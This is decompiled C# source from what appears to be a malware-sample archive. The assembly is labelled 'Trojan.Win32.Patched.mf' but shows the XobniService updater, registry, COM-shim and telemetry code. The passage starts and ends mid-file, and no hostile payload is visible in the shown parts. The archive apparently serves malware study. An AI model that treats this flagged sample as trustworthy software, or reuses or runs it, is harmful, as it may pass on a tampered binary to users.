omvuPWeycdB9JSIuI844a6HOfFU5+kT57nkwwxhwLntu7\r\nE/AISDiAMBLExQK2F6vOhbAGCI+55KsR\r\n-----END CERTIFICATE-----\r\n"));
private static readonly char[] h = new char[16]
{
'0',
'1',
'2',
'3',
'4',
'5',
'6',
'7',
'8',
'9',
'A',
'B',
'C',
'D',
'E',
'F'
};
public static string b()
{
if (hs.f != null)
return hs.f;
try
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Xobni", false))
{
if (registryKey != null)
hs.f = (string) registryKey.GetValue("OverrideUpdatePath", (object) hs.e);
}
}
catch
{
hs.f = hs.e;
}
return hs.f;
}
internal static string a()
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Xobni"))
{
if (registryKey != null)
return (string) registryKey.GetValue("InstallDir");
ady.a(Level.Debug, "No Xobni local machine registry key.");
return (string) null;
}
}
internal static string b(string A_0, string A_1)
{
aaa aaa = hs.b(A_1);
if (aaa == null)
{
ady.a(Level.Debug, "No new updates.");
return (string) null;
}
hs.a(aaa);
string str = Path.Combine(A_0, aaa.b());
if (Directory.Exists(A_0))
{
if (hs.c(A_0) && hs.a(A_0, aaa))
return str;
ady.a(Level.Debug, "Deleting old/bad updates.");
Directory.Delete(A_0, true);
}
if (!Directory.Exists(A_0))
{
ady.a(Level.Debug, "Creating update directory.");
Directory.CreateDirectory(A_0);
}
ady.a(Level.Debug, "Downloading update...");
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(aaa.c());
try
{
httpWebRequest.Proxy = WebRequest.DefaultWebProxy;
}
catch (Exception ex)
{
ady.a(Level.Debug, "Error setting web proxy on downloadRequest: " + ex.Message);
}
WebResponse response;
try
{
response = httpWebRequest.GetResponse();
}
catch (WebException ex)
{
ady.a(Level.Debug, "Could not access XobniUpdate.exe URL: " + ex.Message);
return (string) null;
}
using (Stream responseStream = response.GetResponseStream())
{
using (FileStream A_1_1 = new FileStream(str, FileMode.Create))
hs.a(responseStream, (Stream) A_1_1);
}
ady.a(Level.Debug, "Update download completed.");
return hs.a(str, aaa.d()) ? str : throw new Exception("Invalid update hash.");
}
internal static bool c(string A_0)
{
if (Directory.Exists(A_0) && Directory.GetFiles(A_0).Length > 0)
{
ady.a(Level.Debug, "An update is available (but not yet verified).");
return true;
}
ady.a(Level.Debug, "There are no pending updates available.");
return false;
}
internal static bool a(string A_0, aaa A_1)
{
string str = Path.Combine(A_0, A_1.b());
if (System.IO.File.Exists(str) && hs.a(str, A_1.d()))
{
ady.a(Level.Debug, "Correctly signed update file already exists.");
return true;
}
ady.a(Level.Debug, "An update exists, but it is not correctly signed.");
return false;
}
internal static aaa b(string A_0)
{
string path1 = hs.a();
if (path1 == null)
{
ady.a(Level.Debug, "No InstallDirectory registry value.");
return (aaa) null;
}
string fileVersion = FileVersionInfo.GetVersionInfo(Path.Combine(path1, "XobniCommon.dll")).FileVersion;
if (string.IsNullOrEmpty(fileVersion))
{
ady.a(Level.Debug, "Bad XobniCommon version " + fileVersion + ".");
return (aaa) null;
}
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(string.Format("{0}?version={1}&source={2}&xmid={3}", (object) hs.b(), (object) fileVersion, (object) A_0, (object) jf.a()));
httpWebRequest.KeepAlive = false;
try
{
httpWebRequest.Proxy = WebRequest.DefaultWebProxy;
}
catch (Exception ex)
{
ady.a(Level.Debug, "Error setting web proxy on updateRequest: " + ex.Message);
}
WebResponse response;
try
{
response = httpWebRequest.GetResponse();
}
catch (WebException ex)
{
ady.a(Level.Debug, "Could not access update check URL: " + ex.Message);
return (aaa) null;
}
if (response.ContentLength == 0L)
{
ady.a(Level.Debug, "No updates available");
return (aaa) null;
}
XmlDocument xmlDocument;
using (Stream responseStream = response.GetResponseStream())
xmlDocument = hs.b(responseStream);
XmlElement documentElement = xmlDocument.DocumentElement;
string[] strArray1 = hs.a(documentElement, "version").InnerText.Split('.');
string str1 = strArray1[2];
int A_0_1 = int.Parse(strArray1[3]);
string[] strArray2 = fileVersion.Split('.');
string str2 = strArray2[2];
if (int.Parse(strArray2[3]) >= A_0_1)
{
ady.a(Level.Debug, "No new updates");
return (aaa) null;
}
if (string.IsNullOrEmpty(str1))
throw new Exception("Invalid branch ID in update");
if (str1.Equals(str2))
{
ady.a(Level.Debug, string.Format("Updating {0} branch", (object) str2));
}
else
{
if (!"0".Equals(str2))
throw new Exception("Invalid branch ID in update");
ady.a(Level.Debug, "Updating unknown branch to release branch");
}
string innerText1 = hs.a(documentElement, "url").InnerText;
string innerText2 = hs.a(documentElement, "hash").InnerText;
string innerText3 = hs.a(documentElement, "localName").InnerText;
return new aaa(A_0_1, innerText1, innerText3, innerText2);
}
private static void a(aaa A_0) => ady.a(Level.Debug, "Update available: Hash(" + A_0.d() + "), BuildNumber(" + (object) A_0.a() + "), LocalName(" + A_0.b() + "), URL(" + A_0.c() + ")");
public static XmlDocument b(Stream A_0)
{
X509Certificate2 A_0_1 = new X509Certificate2(hs.a(A_0));
if (!hs.a(A_0_1))
throw new Exception("Invalid XobniUpdater certificate");
byte[] signature = hs.a(A_0);
byte[] buffer = hs.a(A_0);
if (!((RSACryptoServiceProvider) A_0_1.PublicKey.Key).VerifyData(buffer, (object) new SHA1CryptoServiceProvider(), signature))
throw new Exception("Invalid XobniUpdater signature");
XmlDocument xmlDocument = new XmlDocument();
xmlDocument.Load((Stream) new MemoryStream(buffer));
return xmlDocument;
}
public static void a(Stream A_0, X509Certificate2 A_1, byte[] A_2)
{
X509Certificate2 A_0_1 = new X509Certificate2((X509Certificate) A_1);
if (!hs.a(A_0_1))
throw new ArgumentException("Invalid XobniUpdate certificate");
byte[] A_1_1 = ((RSACryptoServiceProvider) A_0_1.PrivateKey).SignData(A_2, (object) new SHA1CryptoServiceProvider());
A_0_1.PrivateKey = (AsymmetricAlgorithm) null;
hs.b(A_0, A_0_1.RawData);
hs.b(A_0, A_1_1);
hs.b(A_0, A_2);
}
public static bool a(X509Certificate2 A_0)
{
X509Chain x509Chain = new X509Chain();
x509Chain.ChainPolicy.ExtraStore.Add(hs.g);
x509Chain.ChainPolicy.VerificationFlags = X509VerificationFlags.AllowUnknownCertificateAuthority | X509VerificationFlags.IgnoreEndRevocationUnknown | X509VerificationFlags.IgnoreCertificateAuthorityRevocationUnknown | X509VerificationFlags.IgnoreRootRevocationUnknown;
return x509Chain.Build(A_0) && x509Chain.ChainElements.Count == 2 && x509Chain.ChainElements[0].Certificate.Subject.Equals("E=support@xobni.com, CN=XobniUpdate, O=Xobni Corporation, S=CA, C=US") && x509Chain.ChainElements[1].Certificate.Equals((X509Certificate) hs.g);
}
public static XmlElement a(XmlElement A_0, string A_1)
{
XmlNodeList elementsByTagName = A_0.GetElementsByTagName(A_1);
return elementsByTagName.Count == 1 ? elementsByTagName[0] as XmlElement : throw new Exception("Invalid XobniUpdater XML: expected single element");
}
public static byte[] a(Stream A_0)
{
byte[] A_1_1 = new byte[2];
hs.a(A_0, A_1_1);
byte[] A_1_2 = new byte[(int) BitConverter.ToUInt16(A_1_1, 0)];
hs.a(A_0, A_1_2);
return A_1_2;
}
public static void b(Stream A_0, byte[] A_1)
{
byte[] buffer = A_1.Length <= (int) ushort.MaxValue ? BitConverter.GetBytes((ushort) A_1.Length) : throw new ArgumentException("Data length can't be more than " + (object) ushort.MaxValue + " bytes");
A_0.Write(buffer, 0, buffer.Length);
A_0.Write(A_1, 0, A_1.Length);
}
public static void a(Stream A_0, byte[] A_1)
{
int offset = 0;
int length = A_1.Length;
while (length > 0)
{
int num = A_0.Read(A_1, offset, length);
if (num <= 0)
throw new EndOfStreamException(string.Format("End of stream reached with {0} bytes left to read", (object) length));
length -= num;
offset += num;
}
}
public static void a(Stream A_0, Stream A_1)
{
int count1 = 4096;
byte[] buffer = new byte[count1];
for (int count2 = A_0.Read(buffer, 0, count1); count2 > 0; count2 = A_0.Read(buffer, 0, count1))
A_1.Write(buffer, 0, count2);
}
public static string a(byte[] A_0)
{
char[] chArray = new char[A_0.Length * 2];
for (int index = 0; index < A_0.Length; ++index)
{
int num = (int) A_0[index];
chArray[index * 2] = hs.h[num >> 4];
chArray[index * 2 + 1] = hs.h[num & 15];
}
return new string(chArray);
}
public static bool a(string A_0, string A_1)
{
byte[] hash;
using (FileStream inputStream = new FileStream(A_0, FileMode.Open))
hash = new SHA256Managed().ComputeHash((Stream) inputStream);
return A_1.ToUpper().Equals(hs.a(hash));
}
public static string a(string A_0)
{
byte[] hash;
using (FileStream inputStream = new FileStream(A_0, FileMode.Open))
hash = new SHA256Managed().ComputeHash((Stream) inputStream);
return hs.a(hash);
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/jf.cs
+40
View File
@@ -0,0 +1,40 @@
// Decompiled with JetBrains decompiler
// Type: jf
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Runtime.CompilerServices;
internal static class jf
{
private static string a;
[SpecialName]
public static Guid b()
{
try
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Xobni", false))
{
if (registryKey != null)
return new Guid((string) registryKey.GetValue("XMID", (object) string.Empty));
}
}
catch
{
}
return Guid.Empty;
}
[SpecialName]
public static string a()
{
if (jf.a != null)
return jf.a;
jf.a = jf.b().ToString("N").ToUpperInvariant();
return jf.a;
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/ks.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: ks
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[CompilerGenerated]
internal class ks
{
internal static ks.a a;
[StructLayout(LayoutKind.Explicit, Size = 32, Pack = 1)]
private struct a
{
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/l9.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: l9
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.IO;
using XobniLogging;
internal static class l9
{
internal static void c()
{
try
{
try
{
ady.a(Level.Debug, "CheckForRegisteredShim started");
if (l9.b())
return;
ady.a(Level.Debug, "Need to re-register Shim");
l9.a();
}
catch (Exception ex)
{
ady.a(Level.Exception, "Top level Check Shim", ex);
}
finally
{
ady.a(Level.Debug, "Finished Check Shim");
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Outer catch block of Check Shim", ex);
}
}
private static bool b()
{
try
{
return l9.a(Registry.ClassesRoot, "XobniMainConnectorShim.Connect\\", string.Empty, "Connect Class") && l9.a(Registry.ClassesRoot, "XobniMainConnectorShim.Connect\\CLSID\\", string.Empty, "{79a399f3-daa1-46c8-ab92-27c7cbe43251}") && l9.a(Registry.ClassesRoot, "CLSID\\{79a399f3-daa1-46c8-ab92-27c7cbe43251}\\", string.Empty, "XobniMainConnectorShim.Connect") && l9.a(Registry.ClassesRoot, "CLSID\\{79a399f3-daa1-46c8-ab92-27c7cbe43251}\\ProgID\\", string.Empty, "XobniMainConnectorShim.Connect") && l9.a(Registry.ClassesRoot, "CLSID\\{79a399f3-daa1-46c8-ab92-27c7cbe43251}\\InprocServer32\\", "ThreadingModel", "Apartment") && l9.a(Registry.LocalMachine, "SOFTWARE\\Microsoft\\Office\\Outlook\\Addins\\XobniMainConnectorShim.Connect\\", "Description", "Xobni") && l9.a(Registry.LocalMachine, "SOFTWARE\\Microsoft\\Office\\Outlook\\Addins\\XobniMainConnectorShim.Connect\\", "FriendlyName", "Xobni");
}
catch (Exception ex)
{
ady.a(Level.Exception, "Couldn't check Shim reg values", ex);
return false;
}
}
public static string a(RegistryKey A_0, string A_1, string A_2)
{
try
{
using (RegistryKey registryKey = A_0.OpenSubKey(A_1, false))
return registryKey == null ? (string) null : registryKey.GetValue(A_2, (object) null) as string;
}
catch (Exception ex)
{
ady.a(Level.Exception, string.Format("Couldn't get {0} registry value for {1} {2}", (object) A_0, (object) A_1, (object) A_2), ex);
return (string) null;
}
}
private static bool a(RegistryKey A_0, string A_1, string A_2, string A_3)
{
try
{
string str = l9.a(A_0, A_1, A_2);
if (string.IsNullOrEmpty(str) && !string.IsNullOrEmpty(A_3))
{
ady.a(Level.Debug, string.Format("Couldn't find registry key {0} {1} {2}", (object) A_0, (object) A_1, (object) A_2));
return false;
}
if (A_3.Equals(str))
return true;
ady.a(Level.Debug, string.Format("Registry key {0} {1} {2} has wrong value: {3}", (object) A_0, (object) A_1, (object) A_2, (object) str));
return false;
}
catch (Exception ex)
{
ady.a(Level.Exception, "Couldn't read registry value", ex);
return false;
}
}
private static void a()
{
try
{
ady.a(Level.Debug, "Re-Registering Shim");
string path1 = gs.a();
ady.a(Level.Debug, string.Format("Installation path is {0}", (object) path1));
string str = Path.Combine(path1, "XobniMainConnectorShim.dll");
ady.a(Level.Debug, "XobniMainConnectorShim path is " + str);
if (!File.Exists(str))
throw new Exception("XobniMainConnectorShim doesn't exist or path is incorrect");
eh.b(str);
}
catch (Exception ex)
{
ady.a(Level.Exception, "XobniMainConnectorShim", ex);
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/lo.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: lo
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.IO;
using System.Threading;
using XobniLogging;
internal class lo
{
private lq a;
private lq b;
internal lo()
{
this.a = new lq("Global\\XobniRegSvrSpecialRequest", EventResetMode.AutoReset);
this.b = new lq("Global\\XobniRegSvrSpecialResponse", EventResetMode.ManualReset);
}
internal void b() => this.a.a(new q8(this.a));
internal void c()
{
this.a.f();
this.b.f();
}
private void a()
{
try
{
ady.a(Level.Debug, "Received request to register redemption");
string path1 = gs.a();
ady.a(Level.Debug, "Installation path is " + path1);
string str = Path.Combine(path1, "XobniRdo.dll");
ady.a(Level.Debug, "XobniRdo path is " + str);
if (!File.Exists(str))
throw new Exception("XobniRdo doesn't exist or path is incorrect");
eh.b(str);
this.b.c();
}
catch (Exception ex)
{
ady.a(Level.Exception, "RegisterRedemptionRequest", ex);
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/lq.cs
+134
View File
@@ -0,0 +1,134 @@
// Decompiled with JetBrains decompiler
// Type: lq
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Security.AccessControl;
using System.Threading;
using XobniLogging;
public class lq : IDisposable
{
private const string a = "XobniIpcEvent";
private readonly string b;
private readonly EventResetMode c = EventResetMode.ManualReset;
private EventWaitHandle d;
private bool e;
private bool f;
private readonly object g = new object();
public lq(string A_0, EventResetMode A_1)
{
this.b = A_0;
this.c = A_1;
this.b();
}
public void c() => this.d.Set();
public void d() => this.d.Reset();
public void g() => this.d.Close();
public bool a(TimeSpan A_0) => this.d.WaitOne(A_0, false);
public void a(q8 A_0)
{
lock (this.g)
{
if (this.f)
return;
this.f = true;
}
new Thread(new ParameterizedThreadStart(this.a))
{
Name = (this.b + "WaitThread"),
IsBackground = true
}.Start((object) A_0);
}
private void a(object A_0)
{
try
{
q8 q8 = (q8) A_0;
try
{
while (!this.e)
{
if (this.d.WaitOne(TimeSpan.FromSeconds(1.0), false))
q8();
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "IpcEventWait", ex);
}
}
finally
{
lock (this.g)
this.f = false;
}
}
private void b()
{
try
{
this.d = EventWaitHandle.OpenExisting(this.b);
}
catch (WaitHandleCannotBeOpenedException ex)
{
this.a();
}
}
private void a()
{
EventWaitHandleSecurity eventSecurity = new EventWaitHandleSecurity();
EventWaitHandleAccessRule rule = new EventWaitHandleAccessRule("Everyone", EventWaitHandleRights.Modify | EventWaitHandleRights.Synchronize, AccessControlType.Allow);
eventSecurity.AddAccessRule(rule);
bool createdNew;
this.d = new EventWaitHandle(false, this.c, this.b, out createdNew, eventSecurity);
}
public void a(bool A_0)
{
this.e = true;
if (!A_0)
return;
this.g();
}
public void f()
{
try
{
this.a(true);
}
finally
{
GC.SuppressFinalize((object) this);
}
}
void object.e()
{
try
{
this.a(false);
}
catch (Exception ex)
{
ady.a(Level.Exception, "IpcEventFinalizer", ex);
}
finally
{
// ISSUE: explicit finalizer call
this.Finalize();
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/o4.cs
+67
View File
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: o4
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Net;
using XobniLogging;
internal static class o4
{
private const int a = 3;
private const string b = "LoadBehavior";
private const string c = "XobniDisable";
private const string d = "SoftDisableWatcher";
private const string e = "Software\\Microsoft\\Office\\Outlook\\Addins\\XobniMainConnectorShim.Connect";
private static readonly string f = "http://client." + u5.a() + "/recordping?pingType=resetLoadBehavior&xmid={0}";
internal static void a(bool? A_0)
{
try
{
if (A_0.GetValueOrDefault(false))
return;
using (RegistryKey A_0_1 = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Office\\Outlook\\Addins\\XobniMainConnectorShim.Connect", true))
{
if (!o4.a(A_0_1))
return;
A_0_1.SetValue("LoadBehavior", (object) 3);
if (!rx.e())
return;
o4.a();
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Exception checking soft disable", ex);
}
}
private static bool a(RegistryKey A_0)
{
if (A_0 == null || A_0.GetValue("XobniDisable", (object) null) != null)
return false;
int? nullable1 = gs.a<int>(A_0.GetValue("LoadBehavior"));
if (!nullable1.HasValue)
return false;
int? nullable2 = nullable1;
return (nullable2.GetValueOrDefault() != 3 ? 0 : (nullable2.HasValue ? 1 : 0)) == 0;
}
private static void a()
{
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(string.Format(o4.f, (object) jf.a()));
httpWebRequest.KeepAlive = false;
try
{
httpWebRequest.GetResponse();
}
catch (WebException ex)
{
ady.a(Level.Debug, "Could not ping disable Url: " + ex.Message);
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/p3.cs
+30
View File
@@ -0,0 +1,30 @@
// Decompiled with JetBrains decompiler
// Type: p3
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System.Runtime.CompilerServices;
internal static class p3
{
private static string a = string.Empty;
[SpecialName]
public static string a()
{
if (p3.a == null || string.Empty.Equals(p3.a))
{
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Xobni", false))
{
if (registryKey != null)
{
if (registryKey.GetValue("XIID", (object) string.Empty) is string str)
p3.a = str;
}
}
}
return p3.a;
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/q8.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: q8
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
public delegate void q8();
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/rx.cs
+163
View File
@@ -0,0 +1,163 @@
// Decompiled with JetBrains decompiler
// Type: rx
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using GroupPolicy;
using Microsoft.Win32;
using System;
using XobniLogging;
public static class rx
{
private const string a = "GroupPolicyPreferences";
private const string b = "Software\\Policies\\Xobni\\Xobni Sidebar\\Preferences";
private const string c = "auto_updates_on";
private const string d = "ceip_on";
private const string e = "linked_in_on";
private const string f = "skype_on";
private const string g = "yahoo_on";
private const string h = "web_widgets_on";
private const string i = "phone_home_on";
private const string j = "xobni_on";
private const string k = "web_search_on";
private const string l = "data_files_dir";
private const string m = "bottom_web_search_on";
public static bool g()
{
try
{
return rx.d("auto_updates_on").GetValueOrDefault(true);
}
catch (Exception ex)
{
try
{
ady.a(Level.Exception, "AutoUpdates Group Policy", ex);
}
catch
{
}
return true;
}
}
public static bool f(bool A_0) => rx.b("ceip_on").GetValueOrDefault(A_0);
public static bool e(bool A_0) => rx.b("linked_in_on").GetValueOrDefault(A_0);
public static bool d(bool A_0) => rx.b("skype_on").GetValueOrDefault(A_0);
public static bool c(bool A_0) => rx.b("yahoo_on").GetValueOrDefault(A_0);
public static bool b(bool A_0) => rx.b("web_widgets_on").GetValueOrDefault(A_0);
public static bool f() => rx.b("linked_in_on").GetValueOrDefault(true);
public static bool a(bool A_0) => rx.b("web_search_on").GetValueOrDefault(A_0);
public static bool e() => rx.b("phone_home_on").GetValueOrDefault(true);
public static bool d() => rx.b("xobni_on").GetValueOrDefault(true);
public static bool c() => rx.b("data_files_dir").GetValueOrDefault(true);
public static bool b() => rx.b("bottom_web_search_on").GetValueOrDefault(true);
public static string a() => rx.c() ? rx.a("data_files_dir") : string.Empty;
private static bool? d(string A_0) => rx.d(Registry.LocalMachine, A_0);
private static bool? c(string A_0) => rx.d(Registry.CurrentUser, A_0);
private static bool? b(string A_0)
{
PolicySetting policySetting = rx.c(Registry.LocalMachine, A_0);
return policySetting != PolicySetting.NotConfigured ? new bool?(policySetting == PolicySetting.On) : rx.c(A_0);
}
private static string a(string A_0)
{
string str = rx.a(Registry.LocalMachine, A_0);
if (string.IsNullOrEmpty(str))
str = rx.a(Registry.CurrentUser, A_0);
return str;
}
private static bool? d(RegistryKey A_0, string A_1)
{
try
{
switch (rx.c(A_0, A_1))
{
case PolicySetting.Off:
return new bool?(false);
case PolicySetting.On:
return new bool?(true);
case PolicySetting.NotConfigured:
return new bool?();
default:
throw new ApplicationException(string.Format("Bad Policy setting for {0}", (object) A_1));
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "CalculatePolicySetting", ex);
return new bool?();
}
}
private static PolicySetting c(RegistryKey A_0, string A_1)
{
try
{
int? nullable = rx.b(A_0, A_1);
if (!nullable.HasValue)
return PolicySetting.NotConfigured;
switch (nullable.Value)
{
case 0:
return PolicySetting.Off;
case 1:
return PolicySetting.On;
default:
throw new ApplicationException(string.Format("Bad Policy Value {0}", (object) A_1));
}
}
catch (Exception ex)
{
ady.a(Level.Exception, string.Format("CheckRegistryValue {0}", (object) A_1), ex);
return PolicySetting.NotConfigured;
}
}
private static int? b(RegistryKey A_0, string A_1)
{
try
{
using (RegistryKey registryKey = A_0.OpenSubKey("Software\\Policies\\Xobni\\Xobni Sidebar\\Preferences", false))
return registryKey == null ? new int?() : (int?) registryKey.GetValue(A_1, (object) null);
}
catch (Exception ex)
{
ady.a(Level.Exception, string.Format("GetRegistryValue {0}", (object) A_1), ex);
return new int?();
}
}
private static string a(RegistryKey A_0, string A_1)
{
try
{
using (RegistryKey registryKey = A_0.OpenSubKey("Software\\Policies\\Xobni\\Xobni Sidebar\\Preferences", false))
return registryKey == null ? (string) null : registryKey.GetValue(A_1, (object) null) as string;
}
catch (Exception ex)
{
ady.a(Level.Exception, string.Format("GetRegistryStringValue {0}", (object) A_1), ex);
return (string) null;
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/u5.cs
+47
View File
@@ -0,0 +1,47 @@
// Decompiled with JetBrains decompiler
// Type: u5
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Runtime.CompilerServices;
internal static class u5
{
private const string a = "Software\\Xobni\\Settings";
private static string b;
[SpecialName]
public static string a()
{
if (u5.b != null)
return u5.b;
try
{
u5.b = u5.a("XobniDomain");
if (u5.b != null)
return u5.b;
}
catch (Exception ex)
{
}
u5.b = "xobni.com";
return u5.b;
}
[SpecialName]
public static void b(string A_0) => u5.b = A_0;
private static string a(string A_0)
{
using (RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false))
{
if (registryKey1 != null)
return registryKey1.GetValue(A_0, (object) null) as string;
using (RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false))
return registryKey2 == null ? (string) null : registryKey2.GetValue(A_0, (object) null) as string;
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/uj.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: uj
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System.ServiceProcess;
internal static class uj
{
private static void a() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new x()
});
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/x.cs
+206
View File
@@ -0,0 +1,206 @@
// Decompiled with JetBrains decompiler
// Type: x
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Collections.Generic;
using System.Runtime.CompilerServices;
using System.ServiceProcess;
using System.Threading;
using XobniLogging;
public class x : ServiceBase
{
private static bool a;
private static readonly object b = new object();
private static readonly TimeSpan c = TimeSpan.FromSeconds(5.0);
private static readonly TimeSpan d = TimeSpan.FromSeconds(30.0);
private static readonly TimeSpan e = TimeSpan.FromHours(1.0);
private static Thread f;
private lo g;
public x() => this.e();
private void e() => this.ServiceName = "XobniService";
void ServiceBase.a(string[] A_0)
{
try
{
try
{
lock (x.b)
{
if (x.a)
return;
x.a = true;
try
{
if (this.g == null)
{
this.g = new lo();
this.g.b();
}
}
catch (Exception ex)
{
